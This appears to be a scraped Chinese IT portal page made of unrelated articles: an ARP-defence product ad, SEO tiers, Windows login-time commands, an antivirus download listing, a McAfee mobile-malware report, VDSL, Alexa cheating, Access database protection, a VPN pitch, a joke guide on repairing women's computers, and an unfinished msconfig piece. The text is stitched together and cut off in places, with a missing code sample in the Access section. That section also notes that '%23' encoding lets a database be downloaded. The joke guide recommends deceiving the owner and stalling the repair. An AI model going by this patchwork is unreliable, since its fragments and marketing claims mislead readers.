巡路“免疫墙”应运而生,安装在PC机上的免疫墙终端能够完成对MAC-IP的看守式绑定,彻底根除ARP病毒影响,即使本机中毒(删除本机的静态绑定列表),也不能对自身和网络造成影响。安装在服务器上的巡路监控端提供了网络“可视化”的操作平台,不仅可以做到“攻击定位”,更可以将ARP病毒限制在单机范围内,完全避免其对网络的伤害。此外,网络管理员可以制定策略,对攻击行为进行定义和制定“反击”措施,以示惩戒。同时配合具备“ARP先天免疫”功能的欣向路由器,应对内外网的ARP病毒攻击,形成一个三位一体的完整解决方案。
三、巡路免疫墙
巡路免疫墙由免疫墙终端和监控端两部分组成,免疫墙终端安装在内网主机上,监控端安装在服务器上。
免疫墙工作在网卡之上,终端开机后自动运行,没有操作界面,完全服从于“监控端”控制,负责和监控端通信,如接收控制指令。监控端作为整个网络的视窗,可以监测网络中的每个客户端的某些网络行为,如连接速率,建立的连接数目,ARP欺骗,IP欺骗,分片攻击等等。(如图)
巡路免疫墙“授权版”监控端运行界面
巡路免疫墙具备的功能包括:
1.恶意攻击识别:对数据进行精确分析,将“网络攻击”进行拦截,并举报其违规行为,目前支持IP地址欺骗和所有的ARP欺骗,以及洪水包攻击。
2.ARP看守式绑定:彻底根除ARP病毒影响,即使本机中毒(删除本机的静态绑定列表),也不能对自身和网络造成影响——ARP问题终极解决方案。
3.超大流量发现:根据定义,当某台主机流量过大时,系统将进行报警(并反制)。
4.蠕虫病毒发现:当某台主机发起过多连接时,系统将进行报警(并反制)
5.内外网分开统计:针对内网外网数据进行分开统计,避免内网传输被误认为是大流量攻击。
6.流量控制:可以分开控制内网主机的上下传流量。
7.分组权限管理:针对不同的分组可以对内网主机进行分开管理,包括权限和报警条件。
8.采用私有通讯协议加密传输,安全性极高。
9.在保证即时性的同时,对危险行为进行现场保护,日志记录,保证有据可查。
10.客户端及监控端自动升级:最新软件可以迅速布置到所有主机。
四、巡路的扩展
巡路的功能不仅仅局限于ARP问题的解决,针对其他引发网吧断线的“协议性攻击行为”,如UDP攻击,IP分片攻击,SYN攻击、假冒IP欺骗,假冒MAC欺骗,洪水包攻击等等,巡路也提供的很好的解决方案。
所以说,“毒墙、火墙、免疫墙,一个也不能少”。
中国SEOer的几个级别,你属于哪类?
特征:1. 认真看过的SEO文章不超过200篇,没耐心读完他人的SEO博客或教材。只懂SEO的皮毛,对SEO的理解只是改改TITLE、META等。
2. 对教程里提到的优化方法是“完全彻底”的执行,没有分寸的把握。
3. 被搜索引擎控制着情绪:收录多有排名就眉开眼笑;被拔毛或掉了排名就不知所措。
4. 常问类似“网站排名消失了要怎么办?”“我的网站怎么还没收录?”“为什么别人的站排名比我高?”之类的问题。
5. 年龄偏小,盲目崇拜SEO高手。
估计数量:全国10000左右。
Kyw想对你们说:开始实践吧,边实践边大量阅读文章,不怕读不懂就怕你不读,学习要耐心,SEO主要靠自学。
三线的SEOer:
特征:1. 成功优化过几个关键词排名,但对自己的能力有所高估,以排名和流量论英雄,爱炫耀。
2. 以关键词排名为主要服务项目,帮客户做优化时已经注意内容的加强,但还是无法离开群发作弊。
3. 有自己的站,但没有坚持观察,对搜索引擎的脾气没有太多的体会和领悟,遇到新问题后不知所措。
4. 网站优化痕迹明显,常常过度优化。
5. 可能有自己的SEO博客或网站,但原创比例过小,特别关心排名和流量。
估计数量:全国200~300位之间Kyw想对你们说:别被群发堵住了你的思维和视野,虚心很重要。
二线的SEOer:
特征:1. 对SEO技术熟练运用,重视网站内容,对自己的能力有正确的认识和评估,可以承接整站优化项目。
2. 对各家搜索引擎有长期的观察,并且有深刻体会,即使遇到新的SEO问题也可以从容应对,不需要咨询他人。
3. 有自己的SEO理论体系,中国SEO博客的原创主力军。文章被四处转载,搜索“SEO”已经可以找到他们。
4. 开始领悟更高的策略层面。开始拒绝不合适的SEO项目。
5. 网站优化很自然,关键词选择有策略。
估计数量:全国50~100位之间Kyw想对你们说:兄弟们,阿里巴巴的猎头都找你们了吧?这群人最适合到大网站或传统行业站(如医院网站、物流网站)内部负责SEO,一来他们渴望有更大的施展空间,二来网站无需承担过高的薪水支出。
友情提醒:别看那些传统行业的站做的不怎样,但他们开的薪水普遍比互联网公司来的高。
一线的SEOer:
特征:1. 对搜索引擎优化的策略有深刻理解,并熟练运用。
2. 可能有自己的博客,但很少去写,对博客排名和流量已经无所谓。
3. 拥有数个ALEXA一万以内的网站,低调赚钱。从来不吹嘘自己的能力,也不随意给别人看自己的网站。
4. 独立创业或专心做自己的站,已经不提供SEO服务。
估计数量:全国30位以内Kyw想对你们说:谁来上海请一定要找我;谁在上海,请联系我,KYW渴望交流。
顶尖的SEOer:
他们几乎不写博客、不回帖、不参与互联网的争论,每天专心耕耘自己的网站,赚钱很低调,生活很滋润。新浪的SEO不知道哪位负责的,我一直想认识一下,感觉他是顶尖的。另外听说有某SEOer搞英文站做外贸,公司每月营业额好几百万但只有30几个员工,前台小姐的工资都在3000以上。
估计数量:全国10位以内Kyw想对你们说:如果你是这个级别的SEO,请联系我,只要你愿意真心交朋友,在哪我都飞过去找你。
另外还有一类是“自以为是SEOer的SEOer”,就不多说了。
通过命令限制上网用户的权限
通过使用活动目录以及计算机管理工具及配置文件,限制登录次数和登录时间并在一个Windows域中执行限制并不太复杂。不过,如果你拥有一个小型的工作组网络或者只是几台家用电脑,你可以使用net user命令,并且只需要几步就可以完成。
不过,在开始之前,你首先要决定需要限制哪些用户。如果你想列示一台计算机上的所有用户,请执行以下几步:
1.单击“开始”/“运行”,输入“cmd”,单击“确定”。
2.键入“net user”,回车。
这样就会列示一台计算机上的所有账户。下面给出列示结果的大体样子:
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\ Administrator >net user
\\35341B67CC434F6 的用户帐户
-------------------------------------------------------------------------------
Administrator her1 good
He1 myuser letgo
Tomorrowusr
命令成功完成。
我们将要用到上面列表中的名字,并决定限制He1和her1对计算机(或互联网)的访问。为了便于记忆,需要将显示窗口中刚才显示的账户保留着。先从为He1增加限制开始。如果我们决定他只能在早上8点到晚上8点这段时间可以使用计算机。就需要执行下面的步骤:
1.单击“开始”/“运行”/“CMD”,单击“确定”。
2.键入如下的命令:
net user He1 /time: M-Th,4pm-8pm;F-Su,8am-8pm
(用户he1只能在周一到周四的下午四点到晚上8点,以及周五到周日的上午8点到晚上8点可以用计算机。)
3.按下回车键,这时你应该收到一个消息,告诉你这个命令已经成功完成。
C:\Documents and Settings\ Administrator >net user He1 m-th,4pm-8pm;F-Su,8am-8pm
命令成功完成。
C:\Documents and Settings\ Administrator >
如果你想为不同的用户设置不同的限制应该怎样做呢?例如,在我们的例子中,我们允许her1可在更晚的时候使用计算机。因此可以执行如下的命令:
net user her1 /time: M-Th,4pm-9pm;F-Su,8am-9pm
(用户her1能在周一到周四的下午4点到晚上9点,以及周五到周日的上午8点到晚上9点可以用计算机。)
这两个命令可为上述的两个账户在平日和周末设置不同的限制。如果你在设置一个账户时出现了错误,或者想从头再来,你可以用这个命令清除所有的限制:
net user her1 /time: all
实际执行时如下:
C:\Documents and Settings\ Administrator >net user her1 /time: all
命令成功完成。
C:\Documents and Settings\ Administrator >
注意:系统是以一个小时作为增量进行限制的,这意味着你只能以一个小时为单位对用用户进行限制(举例来说,13:00或 1pm, 而不是13:30 或 1:30pm)。你还可以使用一周的七天的缩写,如M,T,W,Th,F,Sa,Su。此外,记住,这些限制不会强制用户下网,而只能限制其登录时间。
控制对计算机和互联网的访问并非难事,如果你还没有实施这个行动的话,笔者建议你这样做。
注:以上命令在Windows XP专业版中运行通过
[推荐]凝逸反病毒 V5.42
| 软件大小: | 4730 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-9-20 18:14:16 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 佚名 |
| 软件添加: | 水土不服 |
| 软件介绍: |
【凝逸实验室】[凝逸反毒] |
| 下载地址: | 小提示:您的IP是117.22.73.104,建议您使用电信下载点 |
| 点击下载=>[迅雷专用] 点击下载=>[山东电信] 点击下载=>[山东网通] 点击下载=>[浙江电信] 点击下载=>[河南网通] 点击下载=>[河南电信] |
动画大小: 6860 K
动画语言: 简体中文
动画类型: 投稿动画
运行环境: Win9x/NT/2000/XP/2003
添加时间: 2007-9-19 20:21:40
软件评级: ★★★
授权方式: 投稿收录
动画作者: 小馒头
软件添加: 水土不服
动画介绍:
手动追杀木马!
刚才不信被一个程序绑了后门..中了木马..看样子是上兴.今天就给大家讲讲怎么手动
去查杀木马
******************************************************************************
本动画的MD5值为:
88c90eab62d8004562266ab2d40653a4 1.exe
下载连接
McAfee发布Windows Mobile风险报告
在《移动恶意软件:威胁与防范》(Mobile Malware: Threats and Prevention)白皮书中,McAfee® Avert®实验室的调查人员讨论了对电话内容的安全破坏以及电话成为远程监视设备等威胁。调查人员还为用户提供了关于如何降低潜在攻击可能性的建议。
McAfee Avert实验室和产品开发高级副总裁Jeff Green说:“携带一部智能电话好比是在口袋里装了一台功能强大的计算机。但是,强大的功能和便利性需要付出代价。这些智能电话就像我们的台式机和笔记本一样也面临着安全威胁。”
移动恶意软件是在过去短短几年时间发展起来的。Avert实验室预测,由于智能电话价格降低,普及率提高,智能电话恶意软件将继续增长。Avert实验室特别指出,针对Windows Mobile的威胁将会大幅度增加,因为该软件的设计为恶意软件作者留下了可乘之机。
在对Microsoft的Windows Mobile进行调查期间, Avert实验室发现,威胁包括无意识暴露设备内容,例如文本消息、电子邮件、文件、呼叫记录和联系人名单等。此外,攻击者可能监控呼叫或者利用基于Windows Mobile的电话并配合语音、图片和视频等工具作为远程监视设备。
然而,Avert实验室表示,不需要立即报警。目前存在的移动恶意软件不会带来重大风险。
Avert实验室研究专家及本白皮书作者Zhu Cheng表示:“虽然现在还处于早期阶段,但是有可能呈现长期发展趋势。我们不会放松警惕。在使用智能电话时有必要采取一些措施。”
《移动恶意软件:威胁与防范》白皮书刊登在以下网站: http://www.mcafee.com/us/threat_center/white_paper.html
网络接入技术介绍 关于VDSL线路接入技术
一、概述
简单地说,VDSL就是ADSL的快速版本。使用VDSL,短距离内的最大下传速率可达55Mbps,上传速率可达2.3Mbps(将来可达19.2Mbps,甚至更高)。上传和下传数据信道都可在现有的POTS或ISDN服务上被频分,使VDSL成为高速、低价网络的佳选。将来的升级可能需要转向回馈抑制(Echo Cancellation)或其它技术以管理线路。象ADSL一样,VDSL将主要用于实时视频传输和高速数据访问。
距离(英尺) 速率(Mbps)
>1000 51.84
>1000 to <= 3000 25.82
>3000 to <= 4500 12.96
二、原理
VDSL的体系结构就象高速的ADSL。VDSL复用上传和下传管道以获取更高的传输速率,它也使用了内置纠错功能以弥补噪声等干扰。VDSL适于短距传输。
目前,建议使用的VDSL编码有四种:CAP、DMT(此二种见ADSL)、DWMT和SLC。DWMT(Discrete Wavelet Multitone)是使用单一载体的子波变换的多重载体调制系统。SLC(Simple Line Code)是一种基带信令版本,它过滤基带并在收发器处还原。
VDSL用频分复用(FDM)分隔信道。以后VDSL将支持对称数据速率,这可能需要转向回馈抑制。通常下传信道配置在上传信道之上,但DAVIC的规范则反之以使VDSL可用于同轴电缆。
转发错误控制是VDSL的另一特性,象ADSL(T1.413)一样,它用一种Reed Solomon编码和interleaving对线噪纠错。
三、目前情况
VDSL技术仍处于初期,长距应用仍需测试。其许多线路特性的数据仅是推测,这可能会损害其整体性能。其端点设备的普及也需要时间。
ADSL具有较好的产品基础,将VDSL与ADSL合用是个好的策略,将ADSL用于远距而VDSL用于近距,它们可以为未来的数据需要提供更好的服务。
中国网站Alexa排名骤降:争宠风投 作弊盛行
近日的Alexa世界网站排名让一些中国网站“心惊肉跳”。由于Alexa频繁更改排名算法,使得一些中国网站的排名大幅下滑。据统计,此前在Alexa排名国内前1000名的网站,被清空或降低排名的网站大概在30%。
Alexa是一家专门发布网站世界排名的网站。1996年4月在美国创立。1999年,Alexa被亚马逊公司收购。Alexa的网站世界排名主要分两种:综合排名和分类排名。综合排名也叫绝对排名,即特定的一个网站在所有网站中的名次。
Alexa每三个月公布一次新的网站综合排名。此排名的依据是,用户链接数(Users Reach)和页面浏览数(Page Views)三个月累积的几何平均值。
由于国内缺少权威的流量统计机构以及工具,美国的Alexa网站已逐渐成为判断国内网站流量排名的一大标准。因此依靠技术手段优化提升排名的网站也越来越多,已经逐渐形成一种风气,直至作弊。
一家专业从事Alexa优化的第三方公司负责人透露,中国网站就是Alexa作弊的重灾区,每次Alexa调整算法时,就会出现排名暴跌甚至被清空的情况。甚至一批获得风投的网站都曾自己操作或付费给专业“优化”排名的公司来与Alexa进行“博弈”。
近期排名大幅下滑和被清空的网站中包括一批获得风投的网站,如酷讯、帖易、爆米花视频等,数量在10家以上。而中国的一些大型网站,如新浪、百度等排名较为稳定。
上述第三方公司负责人透露,为了保持自身的权威性,目前,Alexa在不断调整算法,尤其是进入8月份以来,Alexa更新排名极为频繁,频率也不符常规,这让一些“作弊”的网站很难快速反应。
一家视频网站负责人透露,首先,现在国内中小网站们如此重视Alexa排名,和互联网的整体环境有关,目前国内风险投资活跃,网站希望依靠自己的高排名吸引风投的注意,为自己获得投资制造方便条件。其次,获得风险投资的网站自身有经营压力,有的会使用排名作弊的方法来应对。
这位网站负责人表示,很多同类网站都陷入了一种博弈困境,因为你的竞争对手都做了排名上的优化甚至作弊,而你不做的话,在风险投资和广告商评估的时候可能会处于不利地位。目前网站同质化严重,如果你的Alexa排名较低,你无法跟投资商和广告主解释说,因为其他网站在作弊,所以排名较高,这就倒逼几乎所有的同类网站一起优化甚至作弊。
知名风投商IDG的一只风投基金的副总裁表示,现在风险投资商没有以前那么重视Alexa排名,尤其是在作弊行为较多的情况下。Alexa的指标只是作为一种参考,无法跟网站本身的商业模式、管理团队等因素相比。
国际黑客冒充联合国欺诈围攻iPhone
网络科技的发展为人类带来便利。但与之相应产生的黑客群体,也给人们的生活、经济、甚至国家安全造成巨大的威胁。
据新华社消息,联合国官方网站8月12日遭到黑客攻击,反对美国以及以色列中东政策的口号一度出现在网页之上。联合国秘书长潘基文发表声明的网页也遭到篡改。网站上的其他一些网页也被这些黑客侵入。联合国被迫在当天上午暂时取下几个网页。联合国发言人称,将对此事进行彻查,并加强网络安全。
近几个月来,黑客攻击电脑行动有所增加。今年5月,爱沙尼亚的银行、政府部门网站曾经遭到过有组织的攻击。信用卡资料更成为有组织犯罪活动经常针对的目标。
8月初,美国总统布什前任反恐顾问呼吁,国际社会必须协调行动才能保护互联网免受黑客攻击。
冒充政府部门欺诈
据美国联邦贸易委员会公布的一份报告,近年美国网络犯罪出现新趋势,黑客冒充政府部门通过互联网非法取得他人信息的案件层出不穷。报告告诫说,当用户收到所谓政府部门发来的邮件时,一定要提高警惕,因为美国政府部门是不会向私人用户发送邮件的。
报告说,过去黑客常以金融机构的名义发送邮件,以获得他人信息,牟取经济利益。但近段时间以来,黑客改变了策略,他们在进行网络诈骗时往往打的是政府部门的旗号。
报告说,黑客往往冒充美国联邦贸易委员会、美国国内税收署和司法部等政府机构设置假网站,再发送电子邮件引诱用户访问假网站,从而将“间谍软件”植入用户电脑,以窃取用户密码或其他秘密信息。
数据库安全 关于Access数据库4种安全方式
一、密码式
给数据库起一个随机复杂的名称,避免被猜到被下载,这种方式在以前很流行,因为大家都对自己的代码很有自信。但随着错误提示对数据库地址的泄露导致数据库被非法下载,这种方式也就越来越少人用了。
二、"#"式
在数据库名称里加上#号,从URL上请求时#是请求地址和请求参数的一个分隔字符,如果知道了数据库名,直接请求的话,如:http://www.xx.com/access#.mdb,WEB服务器会认为请求的是access而不是access#.mdb,所以会提示找不到文件,但是很遗憾,URL中对于这些特殊的字符都会有一个特殊的表示方式,#的特殊表示就是%23,如http://www.xx.com/access%23.mdb,那么access#.mdb将会被下载。还有如果用FlashGet之类的下载工具也可以直接下载。
三、ASP式
这种作法是比较专业但也是很安全的也是现在比较流行的作法,但是现在许多的人只是作了一半,只是将数据名改成ASP而以,这样的话直接用FlashGet之类的下载工具一样可以将数据库下载,这种方式的正确作法有两步:
第一步:在数据库内创建一个字段,名称随意,类型是OLE对象,内容设置为单字节型的"
这段代码运行完之后将会在数据库内生成一个nodownload表,表内字段是notdown。如果数据库内已有同名的数据表存在请将代码内的nodownload改成自己想要的数据表名即可。
四、asa式
这种方式的真谛是利用IIS对ASA文件的保护,从而使得数据库文件不能从URL上直接请求下载,但是这种方式被误解成只要将文件后缀改成ASA就可以了。要知道IIS只是对global.asa这个文件名有请求保护,所以这种方式只能将数据库名设置为global.asa,而且要注意的是,设置成global.asa之后最好不要将其放在主机或虚拟目录的根目录里,不然会被IIS当然正常的global.asa文件进行尝试运行的。
网络应用方案 ICEFLOW VPN应用系统组网方案
现状与需求
许多企业在全国各地都建有分支机构或者办事处,随着企业信息化程度的不断提高,各公司均根据行业特点在在企业总部部署如OA系统、ERP系统、财务系统、GIS地理信息系统等应用软件,将企业分布在各地的分支机构和办事处与企业总部互联,达到安全地共享数据和软件资源的目的,若采用DDN专线造价太高,用Modem远程拨号的方式速度又太慢。ICEFLOW为充分考虑信息化投资效果,为企业量身定制的应用系统远程组网解决方案,低成本、高安全性、高可靠性地满足以上需求。VPN使公司所有网络在Internet上组成一个安全的、虚拟的大局域网,企业建立VPN之后可以在广域网环境下建立和局域网环境下一样的多种应用。
ICEFLOW VPN特点
安全:ICEFLOW VPN基于国际标准IPSEC协议构建,采用192位IDEA、DES、3DES高强度加密算法,并采用动态密钥交换机制,其具有全面日志分析管理功能,最大程度保证公网传输中数据安全问题。可以将分部PPTP用户和特定主机绑定,即使PPTP客户用户名密码泄漏也绝无安全隐患。另外,与某类产品相比,ICEFLOW VPN免受网络上病毒的攻击,也避免重启等手续,更有效保证数据传输的安全性
稳定:ICEFLOW VPN按照工业标准设计,支持40000小时连续无故障运行,自动拨号,断线后可在线路恢复正常后10秒内恢复正常运行,支持单机双线路和双机分流备份,有效保证数据流畅通
灵活:ICEFLOW VPN可实时查看当前数据流量;支持DDN,ADSL,CABLE等多种方式接入INTERNET;支持网状结构和星型结构等多种组网方式;可通过监控中心即时监测各个节点使用状态等,内建UPDATE功能,一般新发布的功能均可以免费得到
性价比高:VPN技术过去一直未能在中国得到广泛的应用,其中一个很重要的原因就是接入公网的费用太高,随着进几年ADSL以及其他宽带接入的兴起,用户接入公网的费用已经非常的便宜,如四川电信ADSL虚拟拨号用户接入(512k包月)为120元/月(住宅)、500元/月(单位)。采用ADSL构建企业VPN网络成为当前网络市场一个新的热点。同国内外某些传统的路由器生产厂家相比,ICEFLOW产品功能更强(如:支持ADSL虚拟拨号、支持全网全动态IP等)、价格更低。同国内某些产品相比,
ICEFLOW产品不仅功能更强(如:支持网状结构VPN、支持双机热备份)、价格也不高。
方案概述
ICEFLOW VPN解决方案,是冰峰网络针对现代企事业单位用户的实际需求,精心研制的一种基于IPSEC的第三层VPN路由器组网方案,是可以在全动态IP的广域网上(Internet/城域网),同时支持ADSL,Cable Modem,DDN等宽带接入方式,在接入方式不同的异构网络上搭建统一的IP VPN网络。
对客户来说,我们建议在中心点使用R5000H VPN路由器,各个分支机构使用R5000L VPN 路由器实现各个节点的VPN互联。采用ADSL虚拟拨号或者其他宽带接入方式接入Internet。并通过ICEFLOW VPN路由器构建企业VPN网络。各局域网节点采用ICEFLOW VPN路由器接入VPN,出差或在家可作为移动用户通过PPTP协议接入VPN。
网络架构
总部:总部一般来讲是企业信息存放、处理的中心,网络内部主机数量多,数据流量大,安全性和实时性要求高;因此推荐采用高性能的ICEFLOW R5000H作为接入服务器。对于实时要求很高的企业用户,可以在总部采用两台R5000H 作双机备份,保证稳定数据传输。
分支机构:企业分支机构一般指分布在全国各地规模中等的分公司,公司内部建有中等规模的局域网,同时通过当地ISP提供的宽带接入方式接入因特网。安装一台ICEFLOWR5000L或1700H路由器,作为客户端接入总部。
移动办公用户:采用PPTP或SSL协议,接入总部,可支持CDMA/GPRS及802.11b等无线移动接入,用户即使在乘坐车船甚至飞机的途中,可随时随地实现移动办公。
应用效果
无论是基于B/S还是C/S的模式,都可以利用VPN构建远程实时应用。而且无需铺设专线,无需固定IP地址,无需托管服务器,软件无需任何改动,直接可以使用。
采用PPTP或L2TP拨号的方式,公司老总或外出移动办公人员在外出差时可随时接入企业内部局域网,查询所有相关的财务等重要信息和收发内部邮件,也可以及时发送信息回公司总部,实现移动办公,保证工作效率。
公司和分支机构市场信息、营销方案、客户反馈信息、新产品信息、办公文件、各种报告报表等能在第一时间内实现全公司范围内的及时上传下达,提高工作效率,公司决策人能及时掌握各部门、各员工的工作情况。
建立VPN后,企业内部网络用户仍然能够正常浏览所有因特网信息,并且为内部网络用户提供专业的防火墙保护。
可实现各应用系统等网络版应用系统的远程互联,采用最少的网络互联投资成本,最大限度的发挥公司应用系统的效率,实现无纸化办公,移动办公。各分支机构与总部象在同一间办公室里一样共享并同步应用财务管理、ERP、OA系统,使公司管理更加统一规范,保证财务、物流、信息流的实时更新,确保公司财务高效、透明、安全、快捷,市场信息的及时传递,营销方案的及时执行,提高工作效率。
通过“网上邻居”共享数据文件,访问远程的企业资源数据库,中心的网络管理员可以对整个VPN网络进行集中的状态监控和远程管理配置,可以在各个VPN节点设置动态的流量管理策略,为企业实时业务和多媒体数据流提供良好的带宽保证。
构建了这个网络之后,可以实现其他如视频会议、VOIP、视频监控等扩展应用。
传授一套秘籍:给MM修电脑的高深秘笈
在修之前,向MM反复声明,这电脑鼓掌是有硬件和软件之分的,如果是硬件故障,例如显卡风扇不转了,显示器连线老化,显示器分辨率超出显示器指标,等等都会导致黑屏啊,这个我不回家用专门的工具是修不好的!
这样一旦真的没修好,就立刻耸肩膀作无奈装:真的是硬件问题,还是送去保修吧。而MM当作硬件问题去保修,JS大人即使发现是软件问题,也会毫不犹豫作为硬件问题处理,所以决计不会有败露的麻烦
2、重装是万能药方
不管发生什么,只要MM同意,一律重装系统!这是最简单的方法,虽然很菜。但是如果要感动MM,这也是最好的方法,因为MM会在漫长的等待中觉得你真是很有耐心和爱心的好男人!哈哈哈哈,太阴险了,所以给恐龙修电脑,一般还是对症下药,速战速决,不要绿我,确实当恐龙看上你的时候,你就知道这不是RPWT,而是生命问题
3、关心要无所不在
如果选择重装,一定要反复问MM:真的可以吗?MM第一遍一般就说可以,这时候要问:没有重要的照片、文档吗?MM会犹豫,但是还是会说不要好了;这时候接着问:QQ聊天记录也会丢掉的!MM会说不要了;记着这时要作思考状,然后问:有没有重要的邮件啊,邮件也会丢掉的。一般啊,很多MM这个时候会反悔,她们就会觉得你是超级贴心人了。
如果选择打开机箱,一定要作惊讶状!怎么这么多灰尘啊!!!(我只见过一个MM的机箱里没有灰尘的,她是实在太爱干净了)这时候MM一般都会不知道怎么回答,你立刻要作出为电脑难过的样子:这么好的电脑,灰尘太多怎么跑得快啊,散热也会受影响的,当然容易出问题了。哈哈哈哈,MM内疚的同时就会觉得你这个人特别懂得爱惜珍惜疼惜是新好男人。
技术篇:
1、MM电脑出的通常都是弱智问题
所以不要用特别专业的眼光去分析,一般都是系统设置没设置好,例如曾经一个MM,帮她新配的电脑,说音箱左边的不响,过去检查,果然不响,怎么调都只有电流声,心想坏了,买到坏的了,结果不死心一看,音量控制里她全搁到右声道了,昏死!
对于显示屏黑屏这种事情,要多看看显示器开关有没有开,显示器有没有插上电源,显示器线有没有连到主机等等问题!
稍微高级一点,看看BIOS设定,显示器分辨率设定,对比度设定等等再高级一点,看看是不是显卡风扇停转了在有别的电脑的情况下,和别的电脑对调一下显示器看看,容易分辨是不是显示器的问题,但是要注意,要是女生寝室的话,慎用!!!因为女生寝室一般好像关系都不好,就是好也不愿意为别人的电脑奉献自己的电脑,这一点和男生寝室不一样,要鄙视一下!要想帅,带上可以外接显示器的本本去,要轻薄的,2.3kg以上就不要驮过去丢脸了
2、要想酷、拆机箱
不管是不是硬件问题,如果你想MM崇拜到要嫁给你的地步,记住一定要带上一根较大的十字起子,推荐电脑城装机的那种,很长很长的,超帅!我一般带上两根,一个十字头,一个一字头,一个红色有机玻璃柄,一个绿色玻璃柄,就像两把短剑,有了这两柄利器,感觉立马不一样!MM立刻觉得你就是专业的,如果MM看到后觉得害怕,别忘趁势解释一句:修的多了,随身带着方便,你的问题不一定那么大,或许用不上。MM这个时候只会希望自己的电脑坏的彻底一点,好见识你挥动长剑的潇洒身姿!哈哈哈哈,这句是丫丫而已。
3、熟练掌握BIOS设定的窍门是看说明书
其实很多时候问题和解决问题的方法都在BIOS设定上,例如老肯必须掌握的光驱启动,就在BIOS设定里面,这个时候万一忘记了怎么办,求助于说明书吧!!!其实在说明书中,一般都有详尽的说明,甚至包括常见问题的解决方法,只是MM们比较娇嫩,不适宜阅读这么生硬的文字罢了你的责任就是阅读它们!!!
不要觉得临时看说明书很丢脸!如果说拆机箱可以展现你武的一面,那么你专注阅读的神情正是你展现自己文的一面最好机会!!!能文能武才是你获取MM芳心的致胜法宝,只知道挥着袖子与主板上的灰尘大战的土匪只会让MM觉得这些喜欢硬件的GG都是脏兮兮的疯子。
而你要求获得主板、显卡及其他相关说明书最好的方法,要么就是一开始索要,一 进门就让她把她放这些东西的盒子搬出来放好;要么就是拆开机箱以后,惊讶一句:啊!这不是公版设计,我要看一下出厂时的说明书!!!甭管是什么设计,你这一句话出去,MM只会觉得你暴有水准,一眼就能看出是什么设计,其实她们也不知道什么叫公版设计母版设计的。
感情篇
1、MM的电脑永远都是最好的
MM一般最要面子(当然GG也要,例如老肯),但是找你修电脑总是电脑出了问题,所以你这个时候一定不能在伤口上散盐,切忌在修电脑的时候说:啊这种配置啊,该升级了。或者:这种杂牌的显卡最好不要用。或者:AOC的显示器最烂了。表以为这样可以显示你对硬件市场品牌的了解和个人的品位,这只会让MM恨死你!早期我就犯过类似口不遮拦的错误,结果有一段时间MM们电脑坏了也不敢来找我,唉,前车之鉴啊!
对于MM的电脑,如果牌子好,哪怕是集成主板,也要说这个牌子我最喜欢了,稳定性超好,这次多半是软件问题,D版毛病就是多!(甭管她机子装的系统是不是正版,用的软件总有盗版吧)如果牌子不好,立刻说,这个牌子性价比一直就是最好的,你真会过日子!不要忘记说“你真会过日子”的时候,一定要注视MM面带百分百诚恳的微笑!!!如果真的什么都不行,就是完全该被淘汰的机子,尽量就不要说话了!!!说什么只会让场面更难堪!!!
把电脑当作MM的脸,你就知道该怎么做了!
2、准确把握时间 营造相遇空间
一般MM让你修电脑,如果答谢的话,一般都是请你吃饭,如果她请你吃饭的规格远远超过正常修电脑的花费,不妨检查一下电脑是否有人为破坏的因素对于不同的MM,土匪当然是有的求之不得,有的避之不及因而准确控制维修过程的时间就很重要。这里教初学者一些计算时间的方法:
用GHOST装一个XP系统,一般是25分钟左右(如果你很熟练,20分钟内就够了)用自动方式装一个XP系统,大约是1个小时(具体没算过,如果是烂威盛主板,装 好驱动还不止)装一个OFFICE,大约还是要半个小时(这个可以在自定义里中选择,想拖延时间就全选,大概可以多争取半小时)时间还不到吃饭时间,或者时间到了吃饭时间但是你不想去,都可以通过装软件来慢慢消耗,实在不行,就卸载了多装几遍!
当你长年累月修电脑产生厌烦心理时,推荐使用市面上的高度集成版的XP的GHOST版,一次把乱七八糟的软件都给装上了,整个时间和装一个XP干净系统也差不多,装完就走人,又快又省事如果老肯可以到这个境界的话,应该已经结婚了
3、修理MM电脑的过程也是检查MM人品的过程
实际上利用修电脑这一机会来泡MM的土匪,一般平时都是花了较多时间陪着自己的电脑和网友,没有太多时间和固定场所(例如大学自修室、英语角或者公共社交场所)接触真实MM的人。很多这方面的高手也都是成功地在修好电脑的同时弥补了自己姻缘的缺憾,顺利找到另一半!但是并不是所有的相遇都是美满的结局,这除了土匪个人的RPWT,主要还在于他们在修理电脑的时候没有注意MM们的RPWT。给出一些个人建议:
如果MM只会站在一边看着你修,连杯水都不给你倒,除非她年纪太小太不懂事,不然这样的MM基本不懂关心照顾别人,也不懂尊重别人的劳动和付出。这样的MM若不是超级大美女,还是算了!
如果MM会一直问这问那,特别是如果主要问你为什么要这样修的原因,这种MM不够重视分工,喜欢主导一切,不能够尊重权威和相信理性,娶回家只会让你多一个唠唠叨叨的监工。如果你不喜欢被人呼来唤去,没有自疟倾向,这种MM还是算了!
如果MM一直问你要不要喝水,要不要歇一会儿,还问一些和修电脑无关的情况,例如问你这么好的技术都怎么学来的啊,如果殷勤到一反常态的地步,恭喜你!这个MM想泡你!!!如果这个MM一贯对人热情,那么这种MM属于擅长公关,有很强的管理和组织能力,这种MM也会成为未来家中的主管,但是好在是一种以人为本的管理,你不至于太痛苦这样的MM,只要平时不是那种过分往上爬巴结领导的类型,实际上还算不错的选择
如果MM话并不多,默默地给你倒杯水,然后再一旁看着,不时跑过来帮你递东西,这种是贤妻良母型,是那种甘愿在背后默默支持你的类型,你要是事业主导型的土匪,毫不犹豫泡这个MM吧!!!极品赞不绝口。(就是恐龙也不妨考虑一下)
如果MM给你东西吃,证明对你不见外;从来没见过的MM话,证明对你很有好感!小子,你赚了!
MM站着看你修电脑,有座位不坐,离得近的是关心电脑!离得远的还站着,如果不是眼睛超好的那种,这种MM有同甘共苦的意识,一般富有同情心,比较爱国(自己到时候对照一下)
MM坐着看你修电脑,正常;MM坐着但是不看你,眼光会游移到别的地方或者做自己的小动作,死了心吧!她已经有意中人了!
MM修电脑的时候把父母介绍给你(到她家修电脑)或者给你看她存在电脑上家人的照片,她很希望成为你重要的朋友。
MM修电脑的时候把MM介绍给你,电脑其实没问题,这个MM觉得你人不错,肥水不流外人田,便宜自己的姐妹先??
由浅入深学习MSConfig命令的使用方法
为了解决类似问题,微软在系统中提供了一个实用工具——系统配置实用程序(Msconfig)。
